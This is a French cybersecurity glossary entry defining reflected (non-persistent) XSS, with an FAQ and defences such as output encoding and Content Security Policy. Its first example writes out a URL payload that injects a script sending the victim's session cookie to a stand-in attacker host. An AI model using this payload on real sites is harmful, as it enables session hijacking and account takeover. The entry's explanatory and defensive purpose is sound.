Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 912

XSS Réfléchi

Qu'est-ce que XSS Réfléchi ?

XSS RéfléchiXSS non persistant où l'entrée contrôlée par l'attaquant est immédiatement reflétée dans la réponse et exécutée dans le navigateur de la victime.


Le XSS réfléchi (non persistant, Type 1) se produit lorsqu'une application web prend des données issues d'une requête HTTP — souvent un paramètre d'URL ou un champ de formulaire — et les renvoie dans la réponse sans encodage de sortie adéquat. L'attaque requiert que la victime clique sur un lien forgé, c'est pourquoi elle est généralement diffusée par hameçonnage, malvertising ou messagerie. Une exploitation réussie permet de voler des cookies de session, d'agir au nom de l'utilisateur ou de mener à un compromis complet du compte. Les défenses incluent l'encodage HTML contextuel, une Content Security Policy stricte et les frameworks qui échappent automatiquement les sorties.

Exemples

  1. 01

    https://exemple.com/search?q=<script>document.location='https://mechant/?c='+document.cookie</script>

  2. 02

    Page d'erreur qui restitue un paramètre 'message' non assaini directement dans le DOM.

Questions fréquentes

Qu'est-ce que XSS Réfléchi ?

XSS non persistant où l'entrée contrôlée par l'attaquant est immédiatement reflétée dans la réponse et exécutée dans le navigateur de la victime. Cette notion relève de la catégorie Attaques et menaces en cybersécurité.

Que signifie XSS Réfléchi ?

XSS non persistant où l'entrée contrôlée par l'attaquant est immédiatement reflétée dans la réponse et exécutée dans le navigateur de la victime.

Comment fonctionne XSS Réfléchi ?

Le XSS réfléchi (non persistant, Type 1) se produit lorsqu'une application web prend des données issues d'une requête HTTP — souvent un paramètre d'URL ou un champ de formulaire — et les renvoie dans la réponse sans encodage de sortie adéquat. L'attaque requiert que la victime clique sur un lien forgé, c'est pourquoi elle est généralement diffusée par hameçonnage, malvertising ou messagerie. Une exploitation réussie permet de voler des cookies de session, d'agir au nom de l'utilisateur ou de mener à un compromis complet du compte. Les défenses incluent l'encodage HTML contextuel, une Content Security Policy stricte et les frameworks qui échappent automatiquement les sorties.

Comment se défendre contre XSS Réfléchi ?

Les défenses contre XSS Réfléchi combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.

Quels sont les autres noms de XSS Réfléchi ?

Noms alternatifs courants : XSS non persistant, XSS Type 1.

Termes liés

Voir aussi